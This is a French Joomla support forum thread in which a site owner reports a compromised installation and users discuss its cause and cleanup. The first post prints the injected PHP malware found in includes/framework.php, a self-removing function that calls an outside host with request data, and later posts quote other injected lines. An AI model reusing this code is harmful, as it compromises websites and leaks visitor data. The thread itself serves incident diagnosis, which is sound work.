piratage joomla suite faille dans fichier includes/framework.php.

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] piratage joomla suite faille dans fichier includes/framework.php.

    Bonjour
    je suis sur l'hébergeur celeonet qui vient de me dire que mon site et d'autres ont été piratés suite à une faille joomla dans le fichier /includes/framework.php
    je cite:
    Le fichier /ap1510/includes/framework.php inclut, dans une fonction rajoutée à la fin du fichier, un appel vers une URL qui ne répond pas, et l'erreur de timeout est donc causée par cela.
    C'est un piratage que nous avons constaté plusieurs fois cette semaine, exploitant une faille de Joomla.

    effectivement voici les lignes ajoutées en fin de fichier
    check_meta();
    function check_meta(){
    $jp = __FILE__;
    $jptime = filemtime($jp);

    if(time() >= 1456727708){
    $jp_c = file_get_contents($jp);
    if($t = @strpos($jp_c,"check_meta();")) {
    $contentp = substr($jp_c,0,$t);
    if(@file_put_contents($jp, $contentp)){
    @touch($jp,$jptime);
    }
    }
    }
    @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php");
    }

    Bien sur on peut retirer les lignes mais rien n’empêchent les c....... qui n'ont rien d'autres à f...... de les remettre.
    y a t'il une version prévue prochainement pour corriger cette faille ou au moins un fichier pour palier le pb

    merci
    Obibi Kenowan
    (La Force n'est pas toujours avec moi !)
    Etienne Audfray Sculpteur http://www.audfray.com
    Armand Petersen Sculpteur http://www.armand-petersen.fr

  • #2
    Re : piratage joomla suite faille dans fichier includes/framework.php.

    Celeonet indique également que ces fichiers auraient été modifiés

    2016-02-22 07:31:02.358702662 +0100 ./includes/framework.php
    2016-02-23 08:37:49.952701926 +0100 ./modules/mod_feed/tmpl/mod_feed.php
    2016-02-23 08:37:49.967702541 +0100 ./components/com_content/helpers/helpers.php
    2016-02-24 19:04:29.877702081 +0100 ./cache/widgetkit/widgetkit-b0f37047.css
    2016-02-24 19:04:30.022702830 +0100 ./cache/widgetkit/widgetkit-be673286.js
    2016-02-24 19:05:01.633702694 +0100 ./configuration.php
    2016-02-25 09:50:37.670702954 +0100 ./logs/error.php
    Obibi Kenowan
    (La Force n'est pas toujours avec moi !)
    Etienne Audfray Sculpteur http://www.audfray.com
    Armand Petersen Sculpteur http://www.armand-petersen.fr

    Commentaire


    • #3
      Re : piratage joomla suite faille dans fichier includes/framework.php.

      Le même code a été signalé ce jour par un autre membre, sur un site 1.5, apparaissant sur le site même.
      J'ai donc quelques doutes sur la notion de "faille Joomla!" concernant ce fichier framework.php, pensant plutôt à la simple utilisation de ce fichier par les pirates.
      Attendons l'avis des pros de la sécurité.
      "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
      MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr et sites perso chez PlanetHoster + sites gérés chez PHPNET, 1and1 et OVH

      Commentaire


      • #4
        Re : piratage joomla suite faille dans fichier includes/framework.php.

        Bonjour,

        Je peux assurer que je viens de faire le test à savoir supprimer les dernières lignes et le site refonctionne parfaitement
        Obibi Kenowan
        (La Force n'est pas toujours avec moi !)
        Etienne Audfray Sculpteur http://www.audfray.com
        Armand Petersen Sculpteur http://www.armand-petersen.fr

        Commentaire


        • #5
          Re : piratage joomla suite faille dans fichier includes/framework.php.

          Ce qui ne veut pas dire qu'il s'agit d'une faille de Joomla! portant sur ce fichier (d'autant que d'autres t'ont été signalés comme également touchés).
          Tu as certainement un fichier caché quelque part qui régénère ce code.
          "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
          MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr et sites perso chez PlanetHoster + sites gérés chez PHPNET, 1and1 et OVH

          Commentaire


          • #6
            Re : piratage joomla suite faille dans fichier includes/framework.php.

            Bonjour

            Ton hébergeur peut-il ne pas crier au loup mais donner un peu plus d'éléments factuels ?

            "Mon PC contient un virus; c'est la faute à Windows", c'est un peu simpliste non ?

            Quelle est ta version de Joomla ? Version de php ? Est-ce que tu utilises des mots de passe fort ? As-tu des extensions à jour ou qui n'ont plus été maintenues depuis longtemps ? etc.

            Je ne puis que te proposer de restaurer une version propre de ton site ou de le nettoyer...
            Christophe (cavo789)
            Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)
            Développeur de marknotes, logiciel de gestion de prises de notes avec interface web et de multiples convertisseur https://github.com/cavo789/marknotes
            Mes logiciels OpenSource : https://www.avonture.be

            Cette anné, le JoomlaDay 2020 FR aura lieu à Bruxelles les 2 et 3 octobre 2020. Plus d'infos sur https://www.joomladay.fr

            Commentaire


            • #7
              Re : piratage joomla suite faille dans fichier includes/framework.php.

              Bonjour.
              ma version de joomla a toujours été la dernière et mise à jour au fil de l'eau
              php 5.6

              Ce que je dis c'est que le 20/01/2016 j'ai transmis un site joomla sur celeonet avec le dernière version de l'époque qui a fonctionné parfaitement jusqu'à hier où je me suis aperçu que mon site n'était plus accessible, qu'il bouclait pour finir par le message:
              Gateway Time-out
              The gateway did not receive a timely response from the upstream server or application.
              Apache Server at www.audfray.com Port 80

              j'ai donc contacté celeonet qui m'a répondu ce que j'ai indiqué dans mon 1er message

              J'ai regardé ce matin en local le fichier ../includes/framework.php que j'ai envoyé à l'époque et qui contient 104 lignes et qui se terminent par
              // System profiler
              if (JDEBUG)
              {
              $_PROFILER = JProfiler::getInstance('Application');
              }

              Ensuite j'ai regardé dans le fichier se trouvant sur celeonet et effectivement des lignes supplémentaires y figurent (celles que j'ai indiqué dans mon message précédent)
              CE N'EST PAS MOI QUI LES AI AJOUTE A LA MAIN

              J'ai supprimé ces lignes en renvoyant le fichier original joomla de framework et le site refonctionne correctement.

              Donc quand celeonet indique "C'est un piratage que nous avons constaté plusieurs fois cette semaine, exploitant une faille de Joomla ", qu'ils en donnent la raison, qu'elle s'avère exacte, on peut peut-être regarder ce qu'ils disent.

              Donc avant de m'agresser et de me demander de RESTAURER UN SITE PROPRE est-ce que vous avez au moins vérifier votre fichier framework.

              Maintenant moi je vous ai transmis cette info pour vous aider vous la prenez ou pas à vous de voir.

              Et puis le plus simple vous prenez contact avec celeonet (08.99.70.63.65 ) et vous discutez entre spécialistes ça ira plus vite.

              Cordialement.
              Obibi Kenowan
              (La Force n'est pas toujours avec moi !)
              Etienne Audfray Sculpteur http://www.audfray.com
              Armand Petersen Sculpteur http://www.armand-petersen.fr

              Commentaire


              • #8
                Re : piratage joomla suite faille dans fichier includes/framework.php.

                @ObibiKenowan : si le message que j'ai écris plus haut t'a choqué / heurté / ... désolé, ce n'était pas le but. Peut-être le style de mon message était défaillant reste que sur le contenu, je ne dirai pas autre chose.

                C'est tellement simple d'incriminer "C'est la faute à ...".

                Je n'insinue pas que tu ais ajouté ces lignes et je ne nie pas le hack; je réfute juste "C'est la faute à Joomla" parce que cela pourrait, peut-être, pourquoi pas être la faute à Voltaire aussi.

                Si Celeonet a trouvé une faille dans Joomla dernière version (tu ne dis pas si tu es en J1.5 dernière version, 2.5 ou 3.4.8) et si c'est 1.5/2.5 tu ne dis pas non plus si tu as mis à jour le fichier session.php publié le 24 décembre.

                Donc, si Celeonet a trouvé une faille dans Joomla 3.4.8, si l'hébergeur peut isoler la faille, alors les utilisateurs de Joomla lui seront reconnaissant de prendre contact avec l'équipe adhoc https://developer.joomla.org/contact-security-team.html

                Pour ton problème Obibi Kenowan : soit tu as une bestiole ailleurs sur ton site qui a causé l'injection de code d'où ma proposition de remonter un site qui était propre soit, on peut encore imaginer "C'est la faute à Celeonet" qui n'isolerait pas des sites hébergés sur le même serveur. On pourrait aussi l'imaginer non? puisque, comme par hasard, ils ont constaté ce hack sur plusieurs sites sur leur propre serveur. Points communs ? Joomla et ... Celeonet.

                [EDIT] Je me relis et je préfère préciser que, ci-dessus, c'était plus un clin d'oeil qu'autre chose : en principe, un hébergeur isole, strictement, chaque client et donc, le site du client A ne peut pas aller contaminer ceux du client B. [/EDIT]

                Je ne veux pas être agressif; ne vois pas ma réaction comme cela.

                Je te souhaite que ton site est maintenant sain et qu'il ne connaîtra plus d'injection de code.
                Dernière édition par cavo789 à 26/02/2016, 16h39
                Christophe (cavo789)
                Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)
                Développeur de marknotes, logiciel de gestion de prises de notes avec interface web et de multiples convertisseur https://github.com/cavo789/marknotes
                Mes logiciels OpenSource : https://www.avonture.be

                Cette anné, le JoomlaDay 2020 FR aura lieu à Bruxelles les 2 et 3 octobre 2020. Plus d'infos sur https://www.joomladay.fr

                Commentaire


                • #9
                  Re : piratage joomla suite faille dans fichier includes/framework.php.

                  Bonjour

                  J'ai 3 sites chez Celeonet, je n'ai rien reçu (pour l'instant).

                  Commentaire


                  • #10
                    Re : piratage joomla suite faille dans fichier includes/framework.php.

                    Bonjour,

                    Comme les autres, utilisant Joomla! depuis longtemps, je n'ai jamais eu ce genre d'intrusion (ni avec J!3.4.8, ni avec les précédentes).

                    Par contre, il faut savoir que TOUTES les versions de PHP avant PHP 5.4.45, 5.5.29, 5.6.13 ont une faille grave dans les méthodes de sérialiasation/désérialisation. https://bugs.php.net/bug.php?id=70219

                    La version de Joomla!3.4.8 a justement modifié sa gestion de sessions pour être moins sensible à ce bug. Mais, en environnement mutualisé, avec une version de PHP antérieure à celles citées, il suffit d'une intrusion via un autre site hébergé, pas nécessairement Joomla! (ou alors un Joomla! pas à jour), mais WordPress, Coppermine, ou tout autre CMS ou applicatif utilisant la gestion native des sessions PHP, pour qu'un simple script injecté en session puisse altérer de manière aléatoire d'autres sites.

                    La faille ne provient pas de Joomla! lui-même, mais soit d'une extension tierce pas à jour, soit d'une version de PHP non mise à jour.
                    Pas de demande de support par MP.
                    S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                    Commentaire


                    • #11
                      Re : piratage joomla suite faille dans fichier includes/framework.php.

                      Envoyé par jisse03 Voir le message
                      il suffit d'une intrusion via un autre site hébergé, pas nécessairement Joomla! (ou alors un Joomla! pas à jour), mais WordPress, Coppermine, ou tout autre CMS ou applicatif utilisant la gestion native des sessions PHP, pour qu'un simple script injecté en session puisse altérer de manière aléatoire d'autres sites.
                      Oui, c'est pour cela que je parlais d'isolation des utilisateurs et des sites. J'ai quand même des doutes qu'aujourd'hui, avec des hébergeurs sérieux, cela puisse encore être le cas càd qu'un site d'un utilisateur A puis venir contaminer le site d'un autre utilisateur.

                      Mais oui, le site 1 de l'utilisateur A peut venir contaminer le site 2 du même utilisateur, ça, c'est bien plus courant et bien plus aisé à faire en php.
                      Christophe (cavo789)
                      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)
                      Développeur de marknotes, logiciel de gestion de prises de notes avec interface web et de multiples convertisseur https://github.com/cavo789/marknotes
                      Mes logiciels OpenSource : https://www.avonture.be

                      Cette anné, le JoomlaDay 2020 FR aura lieu à Bruxelles les 2 et 3 octobre 2020. Plus d'infos sur https://www.joomladay.fr

                      Commentaire


                      • #12
                        Re : piratage joomla suite faille dans fichier includes/framework.php.

                        Bonjour.

                        Déjà pour situer. En local j'utilise WampServer Version 2.5 (Apache : 2.4.9 MySQL : 5.6.17 PHP : 5.5.12 PHPMyAdmin : 4.1.14 SqlBuddy : 1.3.3 XDebug : 2.2.5)
                        mon site en local est en joomla 3.4.8.

                        Quand je lance mon site en local j'ai le message
                        ----------------
                        ( ! ) Notice: Undefined index: HTTP_X_FORWARDED_FOR in C:\wamp\www\ap1602\includes\framework.php on line 13
                        Call Stack
                        # Time Memory Function Location
                        1 0.0000 138976 {main}( ) ..\index.php:0
                        2 0.0010 155744 require_once( 'C:\wamp\www\ap1602\includes\framework.php' ) ..\index.php:36
                        ---------------
                        la ligne 13 est la suivante

                        if(preg_match('!O:[0-9]+:"!iUs', $_SERVER['HTTP_USER_AGENT']) || preg_match('!O:[0-9]+:"!iUs', $_SERVER['HTTP_X_FORWARDED_FOR'])) die();

                        Je signale ce message car il concerne le fameux fichier /include/framework qui faisait planter mon site hier à cause de lignes insérées à la fin.

                        Je répète je ne connais rien à la programmation et donc les infos que je remonte n'ont peut-être aucun rapport avec le problème. c'est juste pour aider au cas où .
                        Obibi Kenowan
                        (La Force n'est pas toujours avec moi !)
                        Etienne Audfray Sculpteur http://www.audfray.com
                        Armand Petersen Sculpteur http://www.armand-petersen.fr

                        Commentaire


                        • #13
                          Re : piratage joomla suite faille dans fichier includes/framework.php.

                          Ton fichier local a été piraté : sur le fichier standard, la ligne 13 est vide.
                          "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
                          MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr et sites perso chez PlanetHoster + sites gérés chez PHPNET, 1and1 et OVH

                          Commentaire


                          • #14
                            Re : piratage joomla suite faille dans fichier includes/framework.php.

                            Bonjour.

                            exact. je viens de récupérer un joomla 3.4.8 et cette ligne n'existe pas.

                            sur la bonne version on a:

                            defined('_JEXEC') or die;

                            // Joomla system checks.
                            @ini_set('magic_quotes_runtime', 0);


                            sur la version piraté on a
                            defined('_JEXEC') or die;



                            if(preg_match('!O:[0-9]+:"!iUs', $_SERVER['HTTP_USER_AGENT']) || preg_match('!O:[0-9]+:"!iUs', $_SERVER['HTTP_X_FORWARDED_FOR'])) die();

                            // Joomla system checks.
                            @ini_set('magic_quotes_runtime', 0);

                            Ce site local est une sauvegarde de mon site en ligne.
                            J'ai donc récupéré ce fichier framework piraté (que se soit d'une faiblesse joomla ou pas ) se trouvant sur le serveur celeonet.

                            J'ai écrasé mon fichier framework par celui de joomla est tout est ok

                            Pour information:
                            Dans le repertoire includes de joomla il y a également le fichier defines.php
                            Dans celui récupéré du serveur j'ai également des lignes en plus en ligne 26/27

                            //Warning: CVE-2015-8562 security fix https://docs.joomla.org/Security_hot...a_EOL_versions
                            if(strpos(@implode($_SERVER),"O:")){die("Hacking attempt!");}

                            si cela vous dit quelque chose .....
                            Obibi Kenowan
                            (La Force n'est pas toujours avec moi !)
                            Etienne Audfray Sculpteur http://www.audfray.com
                            Armand Petersen Sculpteur http://www.armand-petersen.fr

                            Commentaire


                            • #15
                              Re : piratage joomla suite faille dans fichier includes/framework.php.

                              Envoyé par ObibiKenowan Voir le message
                              Bonjour.

                              Déjà pour situer. En local j'utilise WampServer Version 2.5 (Apache : 2.4.9 MySQL : 5.6.17 PHP : 5.5.12 PHPMyAdmin : 4.1.14 SqlBuddy : 1.3.3 XDebug : 2.2.5)
                              mon site en local est en joomla 3.4.8.

                              Quand je lance mon site en local j'ai le message
                              ----------------
                              ( ! ) Notice: Undefined index: HTTP_X_FORWARDED_FOR in C:\wamp\www\ap1602\includes\framework.php on line 13
                              Call Stack
                              # Time Memory Function Location
                              1 0.0000 138976 {main}( ) ..\index.php:0
                              2 0.0010 155744 require_once( 'C:\wamp\www\ap1602\includes\framework.php' ) ..\index.php:36
                              ---------------

                              Je répète je ne connais rien à la programmation et donc les infos que je remonte n'ont peut-être aucun rapport avec le problème. c'est juste pour aider au cas où .
                              Bonjour

                              Ton site local est-il la copie d ton site distant ? Est-ce cette version que tu as transféré en local ou le contraire ?
                              Si ton site local a été piraté, ça vaut dire qu'il est accessible de l'extérieur ou que tu utilises une extensions vérolée.
                              - Est-ce que tu as mis un mot de passe à l’utilisateur "root" ?
                              - Est-ce que Wampserver est interdit au connexions entrante ?

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X